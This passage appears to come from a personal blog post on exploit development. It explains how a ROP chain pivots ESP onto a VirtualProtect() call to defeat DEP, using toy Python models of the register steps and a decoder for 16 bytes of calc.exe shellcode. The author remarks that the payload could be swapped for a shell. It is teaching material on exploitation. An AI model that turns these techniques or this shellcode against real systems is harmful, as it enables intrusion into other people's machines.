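This only models the value that ends up in EAX. It does not model the stack movement caused by each `ret`.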

ECX is moved into EAX:

EAX is then decremented by four, so that it points to where the call to VirtualProtect() sits on the stack:

EAX is then exchanged with ESP (the two registers swap values):

As you can see, ESP now points to the function call, and the ret pops that address into the instruction pointer to kick off execution:
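
The register steps described above can be mimicked with a small Python 3 sketch. All addresses and the `pivot_and_ret` function are hypothetical and chosen only for illustration. The model tracks only the net effect on the registers and ignores the stack movement caused by each gadget's own `ret`.

```python
def pivot_and_ret(regs, stack):
    """Toy model of: mov eax, ecx / (dec eax ; dec eax) x2 / xchg eax, esp ; ret."""
    regs['eax'] = regs['ecx']                              # mov eax, ecx
    for _ in range(2):                                     # two "dec eax ; dec eax" gadgets
        regs['eax'] = (regs['eax'] - 2) & 0xFFFFFFFF
    regs['eax'], regs['esp'] = regs['esp'], regs['eax']    # xchg eax, esp
    regs['eip'] = stack[regs['esp']]                       # ret: pop the dword at ESP into EIP
    regs['esp'] = (regs['esp'] + 4) & 0xFFFFFFFF
    return regs


# Hypothetical layout: the function pointer sits at CALL_SLOT,
# and ECX was saved pointing 4 bytes past it.
CALL_SLOT = 0x0012F000
FUNCTION_POINTER = 0xDEADBEEF      # placeholder, not a real VirtualProtect() address
stack = {CALL_SLOT: FUNCTION_POINTER}
regs = {'eax': 0, 'ecx': CALL_SLOT + 4, 'esp': 0x0012F400, 'eip': 0}

regs = pivot_and_ret(regs, stack)
print(hex(regs['eip']), hex(regs['esp']))
```

After the swap, the final `ret` reads its return address from the restored stack location, which is why execution lands on the function call rather than continuing down the ROP chain.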

As you can see, our calc.exe payload has been executed, and DEP has been defeated! (The PowerShell window shows the DEP policy. Open the image in a new tab to view it better.):

You could certainly replace the calc.exe payload with something like a shell. This was just a POC payload, and there is something about shellcoding by hand that I love, too! ROP is so manual and requires living off the land, so I wanted shellcode that reflected that same philosophy.
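
For readers curious about what those 16 handwritten bytes contain, here is a short Python 3 sketch that pulls out the two embedded values. The byte offsets follow from the x86 encodings noted in the comments. The assumption that the address belongs to system() comes from the comment in the script, and that address is specific to the author's test machine.

```python
import struct

# The same 16 bytes as the shellcode in the script, grouped by instruction.
shellcode = bytes.fromhex(
    "31c0"          # xor eax, eax
    "50"            # push eax          (null terminator for the string)
    "6863616c63"    # push imm32        (the four ASCII bytes of the command)
    "54"            # push esp          (pointer to the string as the argument)
    "be77b1fa6f"    # mov esi, imm32    (address of the function to call)
    "ffd6"          # call esi
)

command_string = shellcode[4:8].decode('ascii')
target_address = struct.unpack('<L', shellcode[10:14])[0]

print(command_string, hex(target_address))
```

Because the call target is hardcoded, the payload is tied to one specific system and module load address, which is the trade-off of writing shellcode this way.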

Final Thoughts

Please email me if you have any further questions! I will try to answer them as best I can. As I continue getting into more and more modern-day exploit mitigation bypasses, I hope to document more of my discoveries and advances in exploit development.

Peace, love, and positivity :-)

ROP is different every time. There is no one way to do it. However, I did learn a lot from this article, and referenced it. Thank you, Peter! :) You are a beast!
